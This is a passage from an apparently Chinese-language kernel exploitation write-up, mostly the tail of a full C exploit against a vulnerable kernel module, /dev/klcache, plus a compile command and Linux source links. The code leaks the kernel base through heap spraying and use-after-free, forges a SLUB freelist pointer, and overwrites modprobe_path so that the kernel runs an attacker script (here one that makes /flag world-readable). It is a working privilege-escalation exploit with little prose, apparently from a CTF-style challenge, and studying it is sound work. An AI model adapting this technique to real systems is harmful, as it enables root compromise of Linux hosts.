        printf("\x1b[34;1m0x%08x:\x1b[0m \x1b[33;1m0x%016lx\x1b[0m    /*  \x1b[90;1m%s\x1b[0m  */\n", i << 3, bufz[i], ascii);
    }
    printf("\n");
}

long show_and_dump(size_t idx) {
#ifndef VERBOSE
    printf("Index: \x1b[32;1m%lu\x1b[0m\n", idx);
#endif
    char buf[OBJECT_SIZE];
    long status = dev_show(idx, &buf);
    dump(&buf);
    return status;
}

int dir_fd_1 = -1;
int dir_fd_2 = -1;
int dir_fd_3 = -1;

typedef void * fl_owner_t;
typedef unsigned int __u32;
struct dnotify_struct {
        struct dnotify_struct *    dn_next;              /*     0     8 */
        __u32                      dn_mask;              /*     8     4 */
        int                        dn_fd;                /*    12     4 */
        struct file *              dn_filp;              /*    16     8 */
        fl_owner_t                 dn_owner;             /*    24     8 */

        /* size: 32, cachelines: 1, members: 5 */
        /* last cacheline: 32 bytes */
};

uint64_t swab64(uint64_t n) {
    uint64_t res = 0;
    for (int i=0; i<8; ++i) {
        res <<= 8;
        res |= (uint64_t)*((uint8_t*)&n+i);
    }
    return res;
}

size_t rnd;
int idx = 0;

int main(){

    dev_fd = open("/dev/klcache", O_RDWR);
    if (dev_fd < 0) {
        err_exit("error opening /dev/klcache", 1);
    }
    
    int victim_fd;
    if ((victim_fd = open("/tmp/victim", O_CREAT | O_RDWR, 0777)) < 0) {
        err_exit("victim", 1);
    }
    
    char cmd[] = "#!/bin/sh\nchmod 777 /flag\n";
    if (write(victim_fd, cmd, strlen(cmd)) < 0) {
        err_exit("write", 1);
    }
    
    close(victim_fd);
    
    struct dnotify_struct buf;
    
    for (int i=0; i<OBJ_SPRAY_NR; ++i) {
        dev_add(&buf);
    }
    
    for (int i=0; i<OBJ_SPRAY_NR; ++i) {
        dev_delete(i);
    }
    
    int stat_fd[NR_STAT];
    for (int i=0; i<NR_STAT; ++i) {
        if ((stat_fd[i] = open("/proc/self/stat", O_RDONLY)) < 0) {
            err_exit("stat", 1);
        }
    }
    
    for (int i=0; i<OBJ_SPRAY_NR; ++i) {
        size_t tmpbuf[4];
        dev_show(i, &tmpbuf);
        if (tmpbuf[0] > KERNEL_BASE_0) {
            kernel_base = tmpbuf[0] - (0xffffffff81479670ULL - KERNEL_BASE_0);
            goto out;
        }
    }
    
    for (int i=0; i<NR_STAT; ++i) {
        close(stat_fd[i]);
    }
    
    err_exit("Exhausted.", 0);

out:
    
    printf("[\x1b[32;1m+\x1b[0m] Kernel Base: 0x%016lx\n", kernel_base);
    
    close(dev_fd);
    
    dev_fd = open("/dev/klcache", O_RDWR);
    if (dev_fd < 0) {
        err_exit("error opening /dev/klcache", 1);
    }
    
    dev_add(&buf);
    dev_add(&buf);
    dev_add(&buf);
    
    dev_delete(0);
    dev_delete(1);
    dev_delete(2);
    
    if ((dir_fd_1 = open("/tmp", O_RDONLY)) < 0) err_exit("1st open", 1);
    if (fcntl(dir_fd_1, F_NOTIFY, DN_MODIFY) < 0) err_exit("1st fcntl", 1);
    
    if ((dir_fd_2 = open("/tmp", O_RDONLY)) < 0) err_exit("2nd open", 1);
    if (fcntl(dir_fd_2, F_NOTIFY, DN_MODIFY) < 0) err_exit("2nd fcntl", 1);
    
    if ((dir_fd_3 = open("/tmp", O_RDONLY)) < 0) err_exit("3rd open", 1);
    if (fcntl(dir_fd_3, F_NOTIFY, DN_MODIFY) < 0) err_exit("3rd fcntl", 1);
    
    size_t orig_buf_0[4];
    size_t orig_buf_1[4];
    size_t orig_buf_2[4];
    dev_show(0, &orig_buf_0);
    dev_show(1, &orig_buf_1);
    dev_show(2, &orig_buf_2);
    
    dev_delete(2);
    dev_delete(1);
    dev_delete(0);
    
    show_and_dump(0);
    show_and_dump(1);
    show_and_dump(2);
    
    size_t buf0[4];
    size_t buf1[4];
    size_t buf2[4];
    dev_show(0, &buf0);
    dev_show(1, &buf1);
    dev_show(2, &buf2);
    
    printf("[\x1b[34;1m*\x1b[0m] swab64(0x%016lx) = 0x%016lx\n", 0x1145141919, swab64(0x1145141919));
    
    rnd = swab64(buf0[0]+16) ^ buf1[0] ^ buf1[2];
    printf("[\x1b[32;1m+\x1b[0m] rnd = 0x%016lx\n", rnd);
    
    printf("[\x1b[32;1m+\x1b[0m] buf1.next = 0x%016lx\n", rnd ^ swab64(buf1[0]+16) ^ buf2[2]);
    
    dev_delete(1);
    
    size_t buf3[4];
    size_t modprobe_path = kernel_base + (MODPROBE_PATH - KERNEL_BASE_0);
    buf3[2] = rnd ^ swab64(buf0[0]+16) ^ modprobe_path;
    
    dev_add(&buf3);
    dev_add(&buf);
    dev_add(&buf);
    
    char buf6[32];
    strcpy(buf6, "/tmp/victim");
    
    dev_add(&buf6);
    
    system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/fake");
    system("chmod +x /tmp/fake");
    system("/tmp/fake");
    
    printf("[\x1b[34;1m*\x1b[0m] Granting read permission for /flag.\n");

    return 0;
}

编译:

musl-gcc -no-pie -z now -o exp_dnotify exp_dnotify.c -masm=intel -static





  1. https://github.com/torvalds/linux/blob/v6.4/include/linux/slab.h
  2. https://github.com/torvalds/linux/blob/v6.4/include/linux/gfp_types.h
  3. https://github.com/torvalds/linux/blob/v6.4/mm/slub.c
  4. https://github.com/torvalds/linux/blob/v6.4/fs/pipe.c
















Tags: #BinaryExploitation, #KernelExploitation, #CrossCache, #HeapSpray, #UAF

Time: 2025-08-15 15:07